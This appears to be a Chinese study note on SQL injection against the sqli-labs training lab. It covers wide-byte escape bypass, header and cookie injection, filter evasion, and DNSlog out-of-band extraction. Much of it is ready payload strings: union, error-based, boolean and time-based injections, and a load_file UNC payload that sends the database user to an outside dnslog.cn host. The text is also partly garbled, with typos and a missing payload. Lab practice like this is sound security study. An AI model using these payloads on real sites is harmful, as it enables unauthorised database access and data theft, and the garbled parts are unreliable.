复显今天的内容宽子节client_ip以及X_FORWARDED_FOR的利用
Sql相关的转义字符函数
在mysql中,用于转义(即在字符串中的符号前加上”\”)的函数有addslashes,mysql_real_escape_string,mysql_escape_string等,还有一种情况是magic_quote_gpc,不过高版本的PHP将去除这个特性。
定义和用法
addslashes()函数返回在预定义字符之前添加反斜杠的字符串。
预定义字符是:
单引号()双引号(")反斜杠(八) NULL
涉及到的基本概念
字符、字符集
字符(character)是组成字符集(character set)的基本单位。对字符赋予一个数值(encoding)来确定这个字符在该字符集中的位置。
UTF8
由于ASCII表示的字符只有128个,因此网络世界的规范是使用UNICODE编码,但是用ASCII表示的字符使用UNICODE并不高效。因此出现了中间格式字符集,被称为通用转换格式,及UTF(Universal Transformation Format)。
宽字节
GB2312、GBK、GB18030、BIG5、Shift_JIS等这些都是常说的宽字节,实际上只有两字节。宽字节带来的安全问题主要是吃ASCII字符(一字节)的现象,即将两个ascii字符误认为是一个宽字节字符。
如果使用了类似于set names gbki这样得语句,此时mysq数据库就会将
Asci大于128(%d州得字符当作是汉字字符得一部分,从而能吃掉,引入单引号或者双号
宽字节注入原理:
GBK 占用两字节
ASCII占用一字节
PHP中编码为GBK,函数执行添加的是ASCII编码(添加的符号为“\”),MYSQL默认字符集是GBK等宽字节字符集。
大家都知道%df’ 被PHP转义(开启GPC、用addslashes函数,或者icov等),单引号被加上反斜杠\,变成了 %df\’,其中\的十六进制是 %5C ,那么现在 %df\’ =%df%5c%27,如果程序的默认字符集是GBK等宽字节字符集,则MySQL用GBK的编码时,会认为 %df%5c 是一个宽字符,也就是縗,也就是说:%df\’ = %df%5c%27=縗’,有了单引号就好注入了。
简单的宽字节注入
Sqli –less 35 存在 addslashes
于是尝试宽字节注入:
获取当前数据库名:
总结:宽字节注入原理即是利用编码转换,将服务器端强制添加的本来用于转义的\符号吃掉,从而能使攻击者输入的引号起到闭合作用,以至于可以进行SQL注入。
User-agent注入
一、什么是User-Agent
User-Agent是Http协议中的一部分,属于头域的组成部分,User Agent也简称UA。用较为普通的一点来说,是一种向访问网站提供你所使用的浏览器类型、操作系统及版本、CPU 类型、浏览器渲染引擎、浏览器语言、浏览器插件等信息的标识。UA字符串在每次浏览器 HTTP 请求时发送到服务器!
浏览器UA 字串的标准格式为: 浏览器标识 (操作系统标识; 加密等级标识; 浏览器语言) 渲染引擎标识 版本信息
INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ( or updatexml(1, concat(#, database()), 0), 1, 1) #
or updatexml(1, concat(#, database()), 0), 1, 1) #
伪造IP注入:Client-ip
getenvget 获得env===>environment 环境
getenv 获得环境变量 $_SERVER
X-Forwarded-For注入
X-Forwarded-For(XFF)是用来识别通过HTTP代理或负载均衡方式连接到Web服务器的客户端最原始的IP地址的HTTP请求头字段。进入环境,打开跳转页
$_SERVER[HTTP_USER_AGENT] ====> user-agent$_SERVER[HTTP_CLIENT_IP] =====> client-ip$_SERVER[HTTP_X_FORWARDED_FOR]=====> x-forwarded-for
发现 HTTP_XXX 都是可以通过控制对应的请求包中的头部的值来控制
SERVER注入
Cookie注入
cookie注入原理其实很简单,就是利用了session机制中的特性,只能说是特性,不能算是漏洞。
这里简单的说下原理,session的机制就相当于你有一张蛋糕店的会员卡,这张会员卡就是你浏览器中的cookie,上边有你的id号等信息,但是是否有效和有多少余额只能由店里边的柜员机决定,这个柜员机就是服务器上的session管理器,注入就好比有人偷偷的复制了你的会员卡(cookie),拿去店里消费,店里的柜员机看到信息相符就处理了。
什么是dnslog注入?
dnslog注入也可以称之为dns带外查询,是一种注入姿势,可以通过查询相应的dns解析记录,来获取我们想要的数据
为什么要进行dnslog注入?
一般情况下,在我们无法通过联合查询直接获取数据的情况下,我们只能通过盲注,来一步步的获取数据,但是,使用盲注,手工测试是需要花费大量的时间的,可能会想到使用sqlmap直接去跑出数据,但在实际测试中,使用sqlmap跑盲注,有很大的几率,网站把ip给封掉,这就影响了我们的测试进度,也许你也可以使用代理池。。。
知识扩展
首先说明,dns带外查询属于MySQL注入,在MySQL中有个系统属性
secure_file_priv特性,有三种状态
secure_file_priv为null 表示不允许导入导出
secure_file_priv指定文件夹时,表示mysql的导入导出只能发生在指定的文件夹
secure_file_priv没有设置时,则表示没有任何限制
可了解一下load_file和outfile
LOAD_FILE()函数
LOAD_FILE()函数读取一个文件并将其内容作为字符串返回
语法为:load_file(file_name),其中file_name是文件的完整路径
此函数使用需要满足的条件
文件必须位于服务器主机上
你必须具有该FILE权限才能读取该文件。拥有该FILE权限的用户可以读取服务器主机上的任何文件,该文件是world-readable的或MySQL服务器可读的,此属性与secure_file_priv状态相关
文件必须是所有人都可读的,并且它的大小小于max_allowed_packet字节
UNC路径
什么是UNC路径?
UNC路径就是类似\\softer这样的形式的网络路径。它符合 \\servername\sharename 格式,其中 servername 是服务器名,sharename 是共享资源的名称。
目录或文件的 UNC 名称可以包括共享名称下的目录路径,格式为:\\servername\sharename\directory\filename。
例如把自己电脑的文件共享,你会获得如下路径,这就是UNC路径
//iZ53sl3r1890u7Z/Users/Administrator/Desktop/111.txt
DNSLOG平台
http://www.dnslog.cn
http://admin.dnslog.link
http://ceye.io
解决特殊符号问题
26-27-28
Sqli less -26
联合查询注入
这一关过滤了and 空格 or
And和or可以用%26%26双写绕过 空格可以用()绕过
?id=0%27union(select(1),group_concat(table_name),user()from(infoorrmation_schema.tables)where(table_schema=0x97479));%00
成功语句
SELECT * FROM users WHERE id=0union(select(1),group_concat(table_name),user()from(infoorrmation_schema.tables)where(table_schema=0x97479))
报错注入
?id=1%27||%20(select%20(extractvalue(1,concat(0x7e,(select%20(group_concat(table_name))%20from%20(infoorrmation_schema.tables)%20where%20(table_schema=0x97479))))));%00
Bool注入
?id=1%27%26%26(ascii(substr(user(),1,1))%3E114%20%23);%00
时间注入
26/?id=1%27%26%26if(ascii(substr(user(),1,1))=114%20%23,sleep(3),1);%00 HTTP/1.1
Sqli less -27
字符型 可难是 id=’1’ 单引号闭合
联合查询
?id=0%27%09uNion%09seLect%091,group_concat(table_name),3%09from%09information_schema.tables%09where%09table_schema=0x97479;%00
报错注入
?id=1%27%09and%09extractvalue(1,concat(0x7e,(seLect%09group_concat(schema_name)%09from%09information_schema.schemata)));%00
Bool注入
时间注入
26/?id=1%27%26%26if(ascii(substr(user(),1,1))=114%20%23,sleep(3),1);%00 HTTP/1.1
Sqli less -28
联合查询注入
?id=0%27)union(select(1),group_concat(table_name),3%09from%09information_schema.tables%09where%09table_schema=%27security%27);%00
Bool 时间注入
?id=0%27)and%09if(ascii(substr(user(),1,1))=114%09,sleep(5),1);%00
DNS注入
?id=0%27)%09and%09(select%09load_file(concat(%27\\\\%27,(select%09hex(user())),%27.3rq4km.dnslog.cn\abc%27)));%00
/有点问题